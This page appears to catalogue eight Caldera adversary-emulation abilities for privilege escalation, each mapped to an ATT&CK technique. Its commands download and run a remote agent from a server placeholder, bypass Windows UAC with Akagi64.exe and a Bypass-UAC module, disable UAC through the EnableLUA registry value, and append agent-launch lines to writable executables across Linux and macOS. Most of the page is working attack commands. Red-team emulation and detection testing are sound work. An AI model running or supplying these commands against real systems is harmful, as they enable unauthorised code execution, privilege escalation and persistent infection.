Home/Caldera abilities

Caldera emulation abilities

8 runnable adversary-emulation actions · command + platform · mapped to ATT&CK

⚠

Abilities

8 shown of 8

privilege-escalation []

Abuse Linux Capability: Python3

Use python3 to pull down Caldera agent as root

Show command

[]

privilege-escalation ["windows"] T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗

Bypass UAC Medium

Bypass user account controls - medium

Show command

[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n"}]

privilege-escalation []

SUID Find & Exploit

Finds all SUID binaries and executes relevant cmds

Show command

[]

privilege-escalation ["windows"] T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗

Slui File Handler Hijack

executes the slui exe file handler hijack

Show command

[{"platform": "windows", "executor": "psh", "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n"}]

privilege-escalation ["windows"] T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗

UAC bypass registry

Set a registry key to allow UAC bypass

Show command

[{"platform": "windows", "executor": "psh", "command": "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n"}]

privilege-escalation ["darwin", "linux"] T1574.010 · Hijack Execution Flow: Services File Permissions Weakness ↗

Weak executable files

Locate and infect files with weak but executable perms

Show command

[{"platform": "darwin", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}, {"platform": "linux", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}]

privilege-escalation ["windows"] T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗

duser/osksupport DLL Hijack

UIPI bypass with uiAccess application

Show command

[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n"}]

privilege-escalation ["windows"] T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗

wow64log DLL Hijack

Dll Hijack of WOW64 logger wow64log.dll using Akagi.exe

Show command

[{"platform": "windows", "executor": "cmd,psh", "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n"}]

Showing 1-8 of 8

Prev 1 Next